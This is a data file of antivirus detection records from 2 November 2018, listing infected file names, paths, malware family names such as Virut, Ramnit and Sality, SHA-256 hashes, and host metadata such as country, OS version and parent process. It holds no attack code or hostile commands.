  Row(detection=Row(filename='ae-ef03-e-psp2$项目进度计划(软件修订记录).xls', filepath='C:\\Users\\X\\Desktop\\AE-EF03-E-PSP2$项目进度计划(软件修订记录).xls', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='1899d4d9c91fcb27d40e5323532cda1136d9eb1526a5e0591d4ba733d9f3b624', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\AE-EF03-E-PSP2$项目进度计划(软件修订记录).xls\\\\\\"', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Notepad++\\notepad++.exe', parentsize=2468016, timestamp='2018-11-02T06:29:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='18aed9087d883e307f6708bbd5be3c5fbe76e3f25bb222510e84b35e45352b4c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:12:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='prounstl.exe', filepath='E:\\Softwares\\Gagibite 61M\\Network\\Intel\\PROXGB\\Win32\\NDIS63\\PROUnstl.exe', filesize=368000, name='W32/Sality.AT.#M1.#R1'), hash='18d48af599c5a4f3ca2f3e70974fa1e8273d34815a4483a113040aa1947c08b0', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SCIENTER\\RestManage\\RestManage.exe', parentsize=3473408, timestamp='2018-11-02T02:32:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='18e83d8d6c9b76bb9f9f63cb86479d711663d31f4ebea678236adb8c0dd59b4e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-4\\18E83D8D6C9B76BB9F9F63CB86479D711663D31F4EBEA678236ADB8C0DD59B4E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='18e83d8d6c9b76bb9f9f63cb86479d711663d31f4ebea678236adb8c0dd59b4e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:23:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='18e83d8d6c9b76bb9f9f63cb86479d711663d31f4ebea678236adb8c0dd59b4e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-4\\18E83D8D6C9B76BB9F9F63CB86479D711663D31F4EBEA678236ADB8C0DD59B4E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='18e83d8d6c9b76bb9f9f63cb86479d711663d31f4ebea678236adb8c0dd59b4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:15:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='18ece932dc5ab9b84c12acae0b09bb3e431b8b82e92e0216d395101d51957f56', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=455680, timestamp='2018-11-02T12:47:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='18ece932dc5ab9b84c12acae0b09bb3e431b8b82e92e0216d395101d51957f56', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:42:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='18ece932dc5ab9b84c12acae0b09bb3e431b8b82e92e0216d395101d51957f56', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T15:22:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005909-6ea1ddb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a82ae42a\\AVSCAN-20181102-224112-BD43C1FB\\AVSCAN-20181103-005909-6EA1DDB3', filesize=2988000, name='TR/Injector.oqpvn.#M1.#R1'), hash='1925d43aef01e3b7d96cd09bdfbd05515ca4c9305685c3997990be1e72f314f1', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:59:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-232122-1b091ac5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a82ae42a\\AVSCAN-20181102-224112-BD43C1FB\\AVSCAN-20181102-232122-1B091AC5', filesize=2988000, name='TR/Injector.oqpvn.#M1.#R1'), hash='1925d43aef01e3b7d96cd09bdfbd05515ca4c9305685c3997990be1e72f314f1', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102022-ca9edc80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-102022-CA9EDC80', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='1941883fc633c8bbebef7d30e9cfec9fcc29dbd588b3eb1dce985bb47e138aa1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='engine.dll', filepath='C:\\Program Files\\Counter-Strike Global Offensive\\bin\\engine.dll', filesize=5888000, name='W32/Ramnit.CD.#M1.#R1'), hash='1959aade57a9d67fa763d5693474ad05180fdfcd35276ae83ea13800b012d0e1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T16:35:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204219-12547da1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_48d360b5\\AVSCAN-20181102-200443-3AC05420\\AVSCAN-20181102-204219-12547DA1', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='199d253e4b9c16a4a180c1446a0e523bfb0f703689cfc8e689da9b1194769bcc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:42:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dccw.exe', filepath='C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='1a6ac4f7fb1d4238cbfa903d3ff204a10a763c63e97fb01aac8d47aaf99a4f2d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dccw.exe', filepath='C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='1a6ac4f7fb1d4238cbfa903d3ff204a10a763c63e97fb01aac8d47aaf99a4f2d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:43:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1  danh sach nhan vi-{ae52fda4-94bf-46d2-98c0-9060e4bcb754}-v4720038.xls', filepath='C:\\System Volume Information\\DFSR\\Private\\{5D15DB92-5FCD-4F87-A494-256E38C2C118}-{35D34436-B455-4AE7-977E-22A1521676FA}\\ConflictAndDeleted\\1  Danh sach nhan vi-{AE52FDA4-94BF-46D2-98C0-9060E4BCB754}-v4720038.xls', filesize=576000, name='X2000M/Agent.2067958.#M1.#R1'), hash='1a731e79f99d969c6088f2f4be6b62f0c87aa181944362b24e1a6a9b475a70eb', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dfsrs.exe', parentsize=None, timestamp='2018-11-02T09:10:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='capafe.exe', filepath='\\\\?\\D:\\programs\\canon 810\\English\\WIN9XSET\\CAPAFE.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='1a923342b602588a48c7924f5615c82ab05ce768045c44ba39942e59bb2070fe', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1a9f85c83ab634e3b53bdef15224bbb200ca065ec6c391ad9f8d6fc55180801a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\1A9F85C83AB634E3B53BDEF15224BBB200CA065EC6C391AD9F8D6FC55180801A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1a9f85c83ab634e3b53bdef15224bbb200ca065ec6c391ad9f8d6fc55180801a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:01:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1a9f85c83ab634e3b53bdef15224bbb200ca065ec6c391ad9f8d6fc55180801a', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\1A9F85C83AB634E3B53BDEF15224BBB200CA065EC6C391AD9F8D6FC55180801A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1a9f85c83ab634e3b53bdef15224bbb200ca065ec6c391ad9f8d6fc55180801a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:41:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goku.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku\\Goku.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1adcd3c0c786fe2b4b7003ca5137bb46d6fe4391b9ad74a201985173a2517507', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='final.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku\\final\\final.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1adcd3c0c786fe2b4b7003ca5137bb46d6fe4391b9ad74a201985173a2517507', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='images.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku\\images\\images.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1adcd3c0c786fe2b4b7003ca5137bb46d6fe4391b9ad74a201985173a2517507', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1AF0128EE50EF35648AF4037EAA25482A5787113DFF2480B798C1DCB78D285BF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090234-3aa351f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-090234-3AA351F4', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:04:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1AF0128EE50EF35648AF4037EAA25482A5787113DFF2480B798C1DCB78D285BF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:27:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1AF0128EE50EF35648AF4037EAA25482A5787113DFF2480B798C1DCB78D285BF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:56:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180050-82347832', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e06872d6\\AVSCAN-20181102-174830-1DEC0225\\AVSCAN-20181102-180050-82347832', filesize=512000, name='TR/Dropper.VB.hjyel.#M1.#R1'), hash='1b4dae080539bb15af72e013862dd5bc1360879b7fdaa08f2a4128d714da3a5f', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='basic.exe', filepath='\\\\?\\D:\\هوشمند\\Hooshmand\\CH_ENGLISH\\Basic\\Basic.exe', filesize=3072000, name='HEUR/APC.#M1.#R1'), hash='1bb80ab49f64b178fc3a25b4982c17162a65ff43a170e010b740c70e00a4c989', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rome2.dll', filepath='H:\\Total War Rome II Emperor Edition\\Rome2.dll', filesize=26752000, name='W32/Ramnit.CD.#M1.#R1'), hash='1bc1882a15ffcfed8f266998f6b4fb8bdab162d73dfd41a0ae29af57feaebf92', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-02T16:59:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111521-063fae43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e2396b3\\AVSCAN-20181102-110019-39F8A128\\AVSCAN-20181102-111521-063FAE43', filesize=624000, name='PUA/InstallCo.zlq.#M1.#R1'), hash='1bcbfd4eb025fcb76b07b3b7928cf2dc8d5132d5280547f68749d390b11b026d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:15:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1BD9643D50CD60D80BFC219E44DAD7F46165582534FB00E134E874A5C3C6766E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:35:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1BD9643D50CD60D80BFC219E44DAD7F46165582534FB00E134E874A5C3C6766E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:57:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1BD9643D50CD60D80BFC219E44DAD7F46165582534FB00E134E874A5C3C6766E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:28:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='explorer.exe', filepath='d:\\windows\\explorer.exe', filesize=2816000, name='W32/Virut.Gen.#M1.#R1'), hash='1c25407da39ce5b376146e95066623dbf9d65c378694d2af10ea083af78dcd07', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:21:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C31A9CBFC6550F82BDCEF0125262CB6D97BD4F40AEF977F4D78DD54DC0D5101', filesize=1156000, name='PUA/SoftPulse.oant.#M1.#R1'), hash='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:36:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C31A9CBFC6550F82BDCEF0125262CB6D97BD4F40AEF977F4D78DD54DC0D5101', filesize=1156000, name='PUA/SoftPulse.oant.#M1.#R1'), hash='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:28:59Z'), dt=datetime.date(2018, 11, 2)),
